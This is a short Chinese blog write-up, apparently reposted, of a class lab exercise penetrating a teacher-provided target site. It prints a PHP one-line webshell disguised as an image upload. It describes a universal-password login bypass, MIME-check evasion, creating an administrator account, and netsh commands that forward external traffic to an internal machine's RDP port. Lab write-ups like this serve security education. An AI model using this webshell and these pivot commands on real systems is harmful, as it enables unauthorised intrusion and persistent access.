一次简单的渗透

一次实验作业,老师给的靶场网站。

进入网站,注册,登录,因为老师给了文件上传提示,所以直奔上传头像处

上传小马,提示图片不存在

将小马后缀改成.jpg,上传抓包

tx的内容应该是将符号用url编码,其他内容用base64编码

tx解码后内容:data:image/jpeg;base64,<?php @eval($_POST['a']); />

发现一句话木马的尾部被修改了,将包发送出去,提示:

查阅资料,应该是会用GD函数将图片渲染,不知道如何绕过。 

上传图片马验证,抓包

包中没有地方能修改文件后缀或文件类型

御剑扫后台,扫出5个没用的目录

自己随便输了/admin,进入后台登录界面

分析该界面,注册、重置密码功能都是用前端JS写的,没有与后台数据库产生交互,只有登录功能有用

尝试万能密码登录成功

登录后是一个上传点,为服务端MIME 类型检测

上传小马,更改文件类型

上传成功

蚁剑连接,查看权限

查看端口,3389端口开放

创建用户并加入管理员组

这台服务器处于内网

使用下面两条命令把来自外部的 tcp 的6666端口流量全部转发到内网的2008r2机器的3389端口上

netsh advfirewall firewall add rule name="winmgmt" dir=in action=allow protocol=TCP localport=6666
netsh interface portproxy add v4tov4 listenport=6666 connectaddress=192.168.2.57 connectport=3389

 用自己创建的账号远程桌面登录

 

https://www.cnblogs.com/paperpen/p/10972904.html

 

原文地址:https://www.cnblogs.com/rnss/p/10973160.html